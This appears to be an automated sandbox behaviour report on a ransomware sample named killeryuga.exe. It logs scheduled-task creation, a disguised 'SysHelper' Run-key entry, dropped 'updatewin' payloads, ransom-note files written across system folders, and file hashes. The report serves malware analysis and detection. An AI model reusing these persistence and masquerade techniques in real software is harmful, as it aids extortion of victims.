File Name c:\windows\system32\taskeng.exe
Command Line taskeng.exe {0E3013FB-5D32-4499-A940-035C87CD1A3B} S-1-5-21-3388679973-3930757225-3770151564-1000:XDUWTFONO\5p5NrGJn0jS HALPmcxz:Interactive:Highest[1]
Initial Working Directory C:\Windows\system32\
Monitor Start Time: 00:00:53, Reason: Created Scheduled Job
Unmonitor End Time: 00:01:18, Reason: Self Terminated
Monitor Duration 00:00:25
Remark No high level activity detected in monitored regions
OS Process Information
»
Information Value
PID 0x50c
Parent PID 0x36c (c:\windows\system32\svchost.exe)
Bitness 64-bit
Is Created or Modified Executable False
Integrity Level High (Elevated)
Username XDUWTFONO\5p5NrGJn0jS HALPmcxz
Enabled Privileges SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege
Thread IDs
0x 97C
0x 578
0x 574
0x 520
0x 514
0x 510
Process #5: killeryuga.exe
2147 11
»
Information Value
ID #5
File Name c:\users\5p5nrgjn0js halpmcxz\desktop\killeryuga.exe
Command Line "C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\killeryuga.exe" --Admin IsNotAutoStart IsNotTask
Initial Working Directory C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\
Monitor Start Time: 00:00:53, Reason: Child Process
Unmonitor End Time: 00:01:19, Reason: Self Terminated
Monitor Duration 00:00:25
OS Process Information
»
Information Value
PID 0x99c
Parent PID 0x8e0 (c:\users\5p5nrgjn0js halpmcxz\desktop\killeryuga.exe)
Bitness 32-bit
Is Created or Modified Executable True
Integrity Level High (Elevated)
Username XDUWTFONO\5p5NrGJn0jS HALPmcxz
Enabled Privileges SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege
Thread IDs
0x 9A0
0x 9A8
0x 9AC
0x 9B0
0x 9B4
0x 9B8
0x 9BC
0x 9C0
0x 9C4
0x 9C8
0x 9CC
0x 9E0
0x 9E4
0x 9E8
Memory Dumps
»
Name Start VA End VA Dump Reason PE Rebuilds Bitness Entry Points YARA Actions
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x004068AB False
...
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x0041551E False
...
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x00404045 False
...
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x00414D7D False
...
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x00408F6D False
...
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x0040E452 False
...
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x0041D8B9, 0x0040BC4A False
...
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x0040AA58 False
...
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x00405A42 False
...
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x0040943F False
...
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x00424067, 0x0041F26F, ... False
...
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x00418238, 0x0040F68F False
...
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x00402D3E, 0x00417990 False
...
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x00401DB0 False
...
buffer 0x00984028 0x009B338E Marked Executable - 32-bit - False
...
buffer 0x00984028 0x009B338E Content Changed - 32-bit 0x00984028 False
...
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x00423043 False
...
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x0041C317 False
...
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x0041B267 False
...
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x0041E4C3 False
...
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x0042CE51 False
...
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x0042D244 False
...
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x004281E0 False
...
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x00422D24 False
...
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x004207EE False
...
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x0043D44C, 0x00439A27, ... False
...
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x00429D19, 0x00438910, ... False
...
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x004400B4 False
...
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x00411BE0 False
...
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x00412360 False
...
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x0040D690, 0x004103C0 False
...
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x00421FDE False
...
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x0043EE43 False
...
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x0043F020 False
...
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x0041A448 False
...
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x0042A000 False
...
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x004135F0 False
...
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x0040C4E0 False
...
Dropped Files
»
Filename File Size Hash Values YARA Match Actions
C:\_readme.txt 1.08 KB MD5: a8d93f8169180c8bd8e1520498934801
SHA1: 5203d1601739402e0d9ba9301fc9c96c90837953
SHA256: 6b9cef14ba78d273cddb4f9d6d1dc894077753da29a8d77ef93d1f5c743fb453
SSDeep: 24:FS2zmHPnIekFQjhRe9bgnYLuWa1mFRqrl3W4kA+GTCkF5M2/k6gJ4Id:DzmHfv0p6WmPFWrDGTFf/kJLd 		False
...
Downloaded Files
»
Filename File Size Hash Values YARA Match Actions
14c7bec7369d4175c6d92554b033862b3847ff98a04dfebdf9f5bb30180ed13e 272.50 KB MD5: 5b4bd24d6240f467bfbc74803c9f15b0
SHA1: c17f98c182d299845c54069872e8137645768a1a
SHA256: 14c7bec7369d4175c6d92554b033862b3847ff98a04dfebdf9f5bb30180ed13e
SSDeep: 6144:7qZQGv0d4dW6efSyahstfKVkW5XXnXXfXXXWXXXXHXXXXBXXXXgXXXXX5XXXXiXk:2ZQGXdPe6qU6W5XXnXXfXXXWXXXXHXXE 		False
...
5caffdc76a562e098c471feaede5693f9ead92d5c6c10fb3951dd1fa6c12d21d 274.50 KB MD5: 996ba35165bb62473d2a6743a5200d45
SHA1: 52169b0b5cce95c6905873b8d12a759c234bd2e0
SHA256: 5caffdc76a562e098c471feaede5693f9ead92d5c6c10fb3951dd1fa6c12d21d
SSDeep: 6144:vLgbC0mVQlY+3aKn7n4CTHcXXnXXfXXXWXXXXHXXXXBXXXXgXXXXX5XXXXiXXXXP:vGCtQlb3aKzvT8XXnXXfXXXWXXXXHXXf 		False
...
079f5422ec8e2d956f0533a2a1a62c0658453dbc2f1db0621f3b175ed2e46a21 153.00 KB MD5: 36185c10c8ccb627648067c8dc5d7e03
SHA1: 9b2435350859250371e00cd52a998f120724e088
SHA256: 079f5422ec8e2d956f0533a2a1a62c0658453dbc2f1db0621f3b175ed2e46a21
SSDeep: 3072:sSfsyx3qXC9zdmPTN1VVsTxKjW4jC5ELiOdBA:sSRxECkWKq 		False
...
114ccacb7ca57c01f3540611fdf49e68416544da8d8077f5896434a4b71b01dd 277.50 KB MD5: e3083483121cd288264f8c5624fb2cd1
SHA1: 144a1dd6714ff4b5675c32f428d1899e500140a5
SHA256: 114ccacb7ca57c01f3540611fdf49e68416544da8d8077f5896434a4b71b01dd
SSDeep: 6144:JMLLGApbfLsx8TsvD6OD61XXnXXfXXXWXXXXHXXXXBXXXXgXXXXX5XXXXiXXXX56:JMLdpMdhDyXXnXXfXXXWXXXXHXXXXBXK 		False
...
206ea70ae672dafb87cb97ba0c95eec21873fcc91d1698cdd66b08e065cbbb20 0.10 KB MD5: bc8dc0185fcf6d2975580c74babacf62
SHA1: 5ffe7319affbbd31ad56f10098ee70b0467a2bda
SHA256: 206ea70ae672dafb87cb97ba0c95eec21873fcc91d1698cdd66b08e065cbbb20
SSDeep: 3:YJMLAA9IIOIKdv/1jETnOnJ/H9PQhiSd/6mgdn82FYn:YIzIfIm+OJP9ohiSd65n82in 		False
...
Host Behavior
COM (8)
»
Operation Class Interface Additional Information Success Count Logfile
Create TaskScheduler ITaskService cls_context = CLSCTX_INPROC_SERVER True 1
Fn
Execute TaskScheduler ITaskService method_name = Connect, server_name = 95, domain = 95, password = 4280555 True 1
Fn
Execute TaskScheduler ITaskService method_name = GetFolder, path = \, new_interface = ITaskFolder True 1
Fn
Execute TaskScheduler ITaskService method_name = NewTask, new_interface = ITaskDefinition True 1
Fn
Execute TaskScheduler ITaskDefinition method_name = get_Triggers, new_interface = ITriggerCollection True 1
Fn
Execute TaskScheduler ITriggerCollection method_name = Create, type = TASK_TRIGGER_TIME, new_interface = IDailyTrigger True 1
Fn
Execute TaskScheduler IDailyTrigger method_name = put_StartBoundary, start_boundary = 2019-03-25T03:38:13 True 1
Fn
Execute TaskScheduler ITaskDefinition method_name = get_Actions, new_interface = IActionCollection True 1
Fn
File (197)
»
Operation Filename Additional Information Success Count Logfile
Create C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\31d598d6-7a99-49f9-bbea-5545d7a59a7d\updatewin1.exe desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\31d598d6-7a99-49f9-bbea-5545d7a59a7d\updatewin2.exe desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\31d598d6-7a99-49f9-bbea-5545d7a59a7d\updatewin.exe desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\31d598d6-7a99-49f9-bbea-5545d7a59a7d\5.exe desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\_readme.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_WRITE True 1
Fn
Create C:\Boot\_readme.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_WRITE True 1
Fn
Create C:\Boot\cs-CZ\_readme.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_WRITE True 1
Fn
Create C:\Boot\da-DK\_readme.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_WRITE True 1
Fn
Create C:\Boot\de-DE\_readme.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_WRITE True 1
Fn
Create C:\Boot\el-GR\_readme.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_WRITE True 1
Fn
Create C:\Boot\en-US\_readme.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_WRITE True 1
Fn
Create C:\Boot\es-ES\_readme.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_WRITE True 1
Fn
Create C:\Boot\fi-FI\_readme.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_WRITE True 1
Fn
Create C:\Boot\Fonts\_readme.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_WRITE True 1
Fn
Create C:\Boot\fr-FR\_readme.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_WRITE True 1
Fn
Create C:\Boot\hu-HU\_readme.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_WRITE True 1
Fn
Create C:\Boot\it-IT\_readme.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_WRITE True 1
Fn
Create C:\Boot\ja-JP\_readme.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_WRITE True 1
Fn
Create C:\Boot\ko-KR\_readme.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_WRITE True 1
Fn
Create C:\Boot\nb-NO\_readme.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_WRITE True 1
Fn
Create C:\Boot\nl-NL\_readme.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_WRITE True 1
Fn
Create C:\Boot\pl-PL\_readme.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_WRITE True 1
Fn
Create C:\Boot\pt-BR\_readme.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_WRITE True 1
Fn
Create C:\Boot\pt-PT\_readme.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_WRITE True 1
Fn
Create C:\Boot\ru-RU\_readme.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_WRITE True 1
Fn
Create C:\Boot\sv-SE\_readme.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_WRITE True 1
Fn
Create C:\Boot\tr-TR\_readme.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_WRITE True 1
Fn
Create C:\Boot\zh-CN\_readme.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_WRITE True 1
Fn
Create C:\Boot\zh-HK\_readme.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_WRITE True 1
Fn
Create C:\Boot\zh-TW\_readme.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_WRITE True 1
Fn
Create C:\Config.Msi\_readme.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_WRITE True 1
Fn
Create C:\Documents and Settings\_readme.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_WRITE True 1
Fn
Create C:\ProgramData\_readme.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_WRITE True 1
Fn
Create C:\ProgramData\Adobe\_readme.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_WRITE True 1
Fn
Create C:\ProgramData\Documents\_readme.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_WRITE True 1
Fn
Create C:\ProgramData\Favorites\_readme.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_WRITE True 1
Fn
Create C:\ProgramData\Microsoft Help\_readme.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_WRITE True 1
Fn
Create C:\ProgramData\Mozilla\_readme.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_WRITE True 1
Fn
Create C:\ProgramData\Oracle\_readme.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_WRITE True 1
Fn
Create C:\ProgramData\Start Menu\_readme.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_WRITE True 1
Fn
Create C:\ProgramData\Sun\_readme.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_WRITE True 1
Fn
Create C:\ProgramData\Templates\_readme.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_WRITE True 1
Fn
Create C:\Recovery\_readme.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_WRITE True 1
Fn
Create C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\_readme.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_WRITE True 1
Fn
Create C:\System Volume Information\_readme.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_WRITE False 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\_readme.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_WRITE True 1
Fn
Create C:\Users\Default\_readme.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_WRITE True 1
Fn
Create C:\Boot\BCD.LOG desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create Directory C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\31d598d6-7a99-49f9-bbea-5545d7a59a7d - True 1
Fn
Open STD_INPUT_HANDLE - True 2
Fn
Open STD_OUTPUT_HANDLE - True 2
Fn
Open STD_ERROR_HANDLE - True 2
Fn
Write C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\31d598d6-7a99-49f9-bbea-5545d7a59a7d\updatewin1.exe size = 10240 True 27
Fn
Data
Write C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\31d598d6-7a99-49f9-bbea-5545d7a59a7d\updatewin1.exe size = 2560 True 1
Fn
Data
Write C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\31d598d6-7a99-49f9-bbea-5545d7a59a7d\updatewin2.exe size = 10240 True 27
Fn
Data
Write C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\31d598d6-7a99-49f9-bbea-5545d7a59a7d\updatewin2.exe size = 4608 True 1
Fn
Data
Write C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\31d598d6-7a99-49f9-bbea-5545d7a59a7d\updatewin.exe size = 10240 True 27
Fn
Data
Write C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\31d598d6-7a99-49f9-bbea-5545d7a59a7d\updatewin.exe size = 7680 True 1
Fn
Data
Write C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\31d598d6-7a99-49f9-bbea-5545d7a59a7d\5.exe size = 10240 True 15
Fn
Data
Write C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\31d598d6-7a99-49f9-bbea-5545d7a59a7d\5.exe size = 3072 True 1
Fn
Data
Write C:\_readme.txt size = 1110 True 1
Fn
Data
Write C:\Boot\_readme.txt size = 1110 True 1
Fn
Data
Write C:\Boot\cs-CZ\_readme.txt size = 1110 True 1
Fn
Data
Write C:\Boot\da-DK\_readme.txt size = 1110 True 1
Fn
Data
Write C:\Boot\de-DE\_readme.txt size = 1110 True 1
Fn
Data
Write C:\Boot\el-GR\_readme.txt size = 1110 True 1
Fn
Data
Write C:\Boot\en-US\_readme.txt size = 1110 True 1
Fn
Data
Write C:\Boot\es-ES\_readme.txt size = 1110 True 1
Fn
Data
Write C:\Boot\fi-FI\_readme.txt size = 1110 True 1
Fn
Data
Write C:\Boot\Fonts\_readme.txt size = 1110 True 1
Fn
Data
Write C:\Boot\fr-FR\_readme.txt size = 1110 True 1
Fn
Data
Write C:\Boot\hu-HU\_readme.txt size = 1110 True 1
Fn
Data
Write C:\Boot\it-IT\_readme.txt size = 1110 True 1
Fn
Data
Write C:\Boot\ja-JP\_readme.txt size = 1110 True 1
Fn
Data
Write C:\Boot\ko-KR\_readme.txt size = 1110 True 1
Fn
Data
Write C:\Boot\nb-NO\_readme.txt size = 1110 True 1
Fn
Data
Write C:\Boot\nl-NL\_readme.txt size = 1110 True 1
Fn
Data
Write C:\Boot\pl-PL\_readme.txt size = 1110 True 1
Fn
Data
Write C:\Boot\pt-BR\_readme.txt size = 1110 True 1
Fn
Data
Write C:\Boot\pt-PT\_readme.txt size = 1110 True 1
Fn
Data
Write C:\Boot\ru-RU\_readme.txt size = 1110 True 1
Fn
Data
Write C:\Boot\sv-SE\_readme.txt size = 1110 True 1
Fn
Data
Write C:\Boot\tr-TR\_readme.txt size = 1110 True 1
Fn
Data
Write C:\Boot\zh-CN\_readme.txt size = 1110 True 1
Fn
Data
Write C:\Boot\zh-HK\_readme.txt size = 1110 True 1
Fn
Data
Write C:\Boot\zh-TW\_readme.txt size = 1110 True 1
Fn
Data
Write C:\Config.Msi\_readme.txt size = 1110 True 1
Fn
Data
Write C:\Documents and Settings\_readme.txt size = 1110 True 1
Fn
Data
Write C:\ProgramData\_readme.txt size = 1110 True 1
Fn
Data
Write C:\ProgramData\Adobe\_readme.txt size = 1110 True 1
Fn
Data
Write C:\ProgramData\Documents\_readme.txt size = 1110 True 1
Fn
Data
Write C:\ProgramData\Favorites\_readme.txt size = 1110 True 1
Fn
Data
Write C:\ProgramData\Microsoft Help\_readme.txt size = 1110 True 1
Fn
Data
Write C:\ProgramData\Mozilla\_readme.txt size = 1110 True 1
Fn
Data
Write C:\ProgramData\Oracle\_readme.txt size = 1110 True 1
Fn
Data
Write C:\ProgramData\Start Menu\_readme.txt size = 1110 True 1
Fn
Data
Write C:\ProgramData\Sun\_readme.txt size = 1110 True 1
Fn
Data
Write C:\ProgramData\Templates\_readme.txt size = 1110 True 1
Fn
Data
Write C:\Recovery\_readme.txt size = 1110 True 1
Fn
Data
Write C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\_readme.txt size = 1110 True 1
Fn
Data
Write C:\Users\5p5NrGJn0jS HALPmcxz\_readme.txt size = 1110 True 1
Fn
Data
Write C:\Users\Default\_readme.txt size = 1110 True 1
Fn
Data
Registry (4)
»
Operation Key Additional Information Success Count Logfile
Open Key HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run - True 1
Fn
Open Key HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run - True 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run value_name = SysHelper, data = "C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\ef299c90-595a-4e2e-bacc-9f2c91e89b2a\killeryuga.exe" --AutoStart, type = REG_EXPAND_SZ True 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run value_name = SysHelper, data = "C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\ef299c90-595a-4e2e-bacc-9f2c91e89b2a\killeryuga.exe" --AutoStart, type = REG_EXPAND_SZ True 1
Fn
Process (458)
»
Operation Process Additional Information Success Count Logfile
Create C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\killeryuga.exe os_pid = 0x9d0, creation_flags = CREATE_DETACHED_PROCESS, CREATE_IDLE_PRIORITY_CLASS, startup_flags = STARTF_USESHOWWINDOW, show_window = SW_HIDE True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\killeryuga.exe os_pid = 0x9d8, creation_flags = CREATE_DETACHED_PROCESS, CREATE_IDLE_PRIORITY_CLASS, startup_flags = STARTF_USESHOWWINDOW, show_window = SW_HIDE True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\31d598d6-7a99-49f9-bbea-5545d7a59a7d\updatewin1.exe show_window = SW_SHOWNORMAL True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\31d598d6-7a99-49f9-bbea-5545d7a59a7d\updatewin2.exe show_window = SW_SHOWNORMAL True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\31d598d6-7a99-49f9-bbea-5545d7a59a7d\updatewin.exe show_window = SW_SHOWNORMAL True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\31d598d6-7a99-49f9-bbea-5545d7a59a7d\5.exe show_window = SW_SHOWNORMAL True 1
Fn
Enumerate Processes - - True 1
Fn
Open System desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Open c:\windows\system32\smss.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Open c:\windows\system32\csrss.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Open c:\windows\system32\wininit.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Open c:\windows\system32\csrss.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Open c:\windows\system32\winlogon.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Open c:\windows\system32\services.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Open c:\windows\system32\lsass.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Open c:\windows\system32\lsm.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Open c:\windows\system32\svchost.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Open c:\windows\system32\svchost.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Open c:\windows\system32\svchost.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Open c:\windows\system32\svchost.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Open c:\windows\system32\svchost.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Open c:\windows\system32\audiodg.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Open c:\windows\system32\svchost.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Open c:\windows\system32\svchost.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Open c:\windows\system32\dwm.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Open c:\windows\explorer.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Open c:\windows\system32\spoolsv.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Open c:\windows\system32\taskhost.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Open c:\windows\system32\svchost.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Open c:\windows\system32\taskeng.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Open c:\windows\system32\taskhost.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Open c:\program files (x86)\windows photo viewer\departure-wm.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Open c:\program files\microsoft synchronization services\controllers.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Open c:\program files\windows portable devices\evaluating_explosion_former.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Open c:\program files (x86)\java\magnificent.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Open c:\program files (x86)\windows media player\pregnancy-infection-derby.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Open c:\program files (x86)\windows photo viewer\kai.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Open c:\program files\microsoft office\dvd_boom_scale.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Open c:\program files (x86)\mozilla firefox\adaptation_sleeping_presentations.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Open c:\program files (x86)\adobe\accommodation-throat-deviation.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Open c:\program files\windows photo viewer\joseph.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Open c:\program files\windows mail\byte-emergency-resulted.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
